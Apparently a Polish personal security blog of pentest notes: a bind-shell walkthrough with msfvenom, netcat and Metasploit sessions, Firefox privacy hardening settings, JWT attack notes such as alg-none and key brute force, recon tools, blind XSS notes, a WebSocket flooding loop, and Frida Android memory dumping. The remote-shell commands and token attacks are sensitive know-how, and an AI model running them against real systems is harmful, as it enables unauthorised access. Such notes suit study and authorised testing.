środa, 12 grudnia 2018

bind shell



msvenom bind shell:

vitim:
msfvenom -p linux/x64/shell_bind_tcp  LPORT=2222  -f elf > shell.elf
./shell.elf

attacker:
nc IP_VICTIM 2222
python -c 'import pty;pty.spawn("/bin/bash")'

OR

msf exploit(multi/handler) > use multi/handler
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2222             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2222
[*] Command shell session 3 opened (10.0.3.15:46445 -> 172.21.65.139:2222) at 2018-12-12 11:54:51 +0100


ls
dirtyc0w




netcat:
nc -lvp 8080 -e /bin/bash <- victim
nc IP_VICTIM 8080 <-- attacker


Bind shell meterpreter

victim:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=2223 -f elf > shell_meterpreter_bind_2223.elf
chmod +x shell_meterpreter_bind_2223.elf
./shell_meterpreter_bind_2223.elf

attacker:
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (linux/x86/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  2223             yes       The listen port
   RHOST  172.21.65.139    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2223
[*] Sending stage (861480 bytes) to 172.21.65.139
[*] Meterpreter session 6 opened (10.0.3.15:41461 -> 172.21.65.139:2223) at 2018-12-12 12:04:01 +0100

meterpreter >

środa, 7 listopada 2018

Hardening firefox

[about:config]
privacy.firstparty.isolate = true
privacy.resistFingerprint = true
privacy.trackingprotection.enabled = true
privacy.donottrackheader.enabled = true
privacy.donottrackheader.value = 1
browser.cache.disk.enable = false
browser.cache.disk.filesystem_reported = 1
browser.cache.disk.smart_size.first_run = false
browser.cache.disk.cache_ssl = false
browser.cache.disk.frecency_experiment = 2
browser.cache.offline.enable = false
browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.send_pings = false
browser.sessionstore.max_tabs_undo = 0
browser.urlbar.speculativeConnect.enabled = false
browser.sessionstore.privacy_level = 2
browser.privatebrowsing.autostart = true
browser.safebrowsing.appRepURL = (empty)
dom.battery.enabled = false
dom.event.clipboardevents.enabled = true
dom.indexedDB.enabled = false
dom.storage.enabled = false
geo.enabled = false
geo.wifi.uri = (empty)
media.navigator.enabled = false
network.cookie.cookieBehavior = 1
network.cookie.lifetimePolicy = 2
network.http.referer.trimmingPolicy = 2
network.http.referer.XOriginPolicy = 2
network.http.referer.XOriginTrimmingPolicy = 2
network.prefetch-next = false
network.http.referer.spoofSource = true
network.dns.disablePrefetch = true
network.IDN_show_punycode = true
webgl.disabled = true
beacon.enabled = false
media.video_stats.enabled = false
media.peerconnection.enabled = false
media.peerconnection.dtmf.enabled = false
media.peerconnection.ice.default_address_only = true
media.peerconnection.ice.no_host = true
media.peerconnection.identity.enabled = false
media.peerconnection.simulcast = false
media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.video.vp9_enabled = false
security.ssl3.rsa_aes_128_sha = false
security.ssl3.rsa_aes_256_sha = false
security.ssl3.rsa_des_ede3_sha = false
general.useragent.site_specific_overrides = true


Plugins:

https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/
https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/ 



Check your browser's properties with:

https://check.torproject.org/
https://ip-check.info/?lang=en
https://ipleak.net/

czwartek, 18 października 2018

JWT - JSON Web Tokens


Notatki z SHP

JTW - bezpieczna wymiana informacji wykorzystująca json pomiędzy dwoma apkami 

Rozkowanie base64 (wiec nie zapewnia poufności) 

Httparchive 

GoogleBigquery i wyszukiwanie danych z httparchive (np. Tokenow jwt, authorization basic itp)

  1. Bruteforce hasla do JWT (np. Hashcatem)
  2. Zmiana algorytmu szyfrującego (np. Z HS256) JWT na none 
  • Uwaga na JWT.io jak wpiszemy alg none to nie pokaże wyników (trzeba samemu base64 codowac
 3. Resign-vuln - szyfruje kluczem prywatnym RSA mój token, a publiczny klucz RSA wrzucam w headerze

JWT WYGLADA TAK:  NAGLOWEK.DANE.PODPIS



sekurak.pl/jwt-ebook.pdf < opis JWT wraz z checlista ]

Rekonesans IT


Notatki z SHP

gotcha.pw - wyciek hasel (pobranie bazy bez gwiazdek? Tak)
https://www.zoomeye.org/ /shodan : (zoomeye: +django +debug.) (W shodan has_screenshot:yes) 
crt.sh  - %domena.pl (szuka subdomen)
builtwith.com/ -pokazuje z jakich technologi zbudowana jest infra,
zakładka relationship profile pokazuje kody trackujace i pokazać inne site które z niego korzystają :) 
hardenize.com - skaner bezpieczenstwa 
android.fallible.co - szuka sekretnych danych w apce mobilnej 
publicwww.com - wyszukiwarka kodow zrodlowych html,css,javascriptow - szukamy tutaj np. Malwarow itp, poszukac klucze api (wpisujac w wyszukiwarke apikey)

github.com/michenriksen/aquatone - szuka subdomen  (szuka we wszystkim virustotal(trzeba dac api key, crt.sh webarchive, itp)

Virustotal.com - search: twitter.com (do szukania subdomen) / szukanie tez wirtualnych domen klikając na IP w wynikach wyszukiwania 
archive.org - szukanie starych linków do aktualnych zasobow, jak juz jest nowa www a stary zasob moze zostal, szukanie tez podd omen

Blind XSS


Notatki z SHP


Excessy - narzędzie do XSS , używające websockets od Michała Bentkowskiego

XSS PROXY - https://github.com/securityMB/excessy 


iframe=sanbox jako ochrona przed xss

  1. request get aby pobrać token csrf
  2. Potem post aby go użyć

środa, 25 kwietnia 2018

WebSocket DoS tester

Pyhton client - websocket denial of service tester


import websocket
import ssl
from websocket import create_connection



counter = 0
while counter <= 100:
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})

        ws.connect("wss://echo.websocket.org")
        print("Sending 'Hello, World'...")
        ws.send("Hello, World")
        print("Sent")
        print("'%s'" % counter)
        print("Receiving...")
        result =  ws.recv()
        print("Received '%s'" % result)
        counter +1

piątek, 13 kwietnia 2018

Android - frida - memory dump app

https://www.frida.re/docs/android/
https://github.com/Nightbringer21/fridump
/fridump# python fridump.py -U -s -o . --max-size 2097152 com.app-name.rc.nopin
http://pentestcorner.com/fridump-android-examples/


D:\Android\sdk\platform-tools>adb shell "su -c /data/local/tmp/frida-server &"

How to install NDK with Android SDK Manager [windows]


  1. Close Android SDK Manager
  2. Start a Command Prompt as Administrator
  3. cd"path to your installation of Android SDK Manager"\tools\bin
  4. sdkmanager ndk-bundle
  5. Accept the License Agreement
  6. Wait a long time. The installation is done without any progress indicator.
  7. When it finally reports done, start Android SDK Manager
  8. Look under Extras and there you'll find Ndk Bundle

https://stackoverflow.com/questions/41471000/how-to-install-ndk-with-android-sdk-manager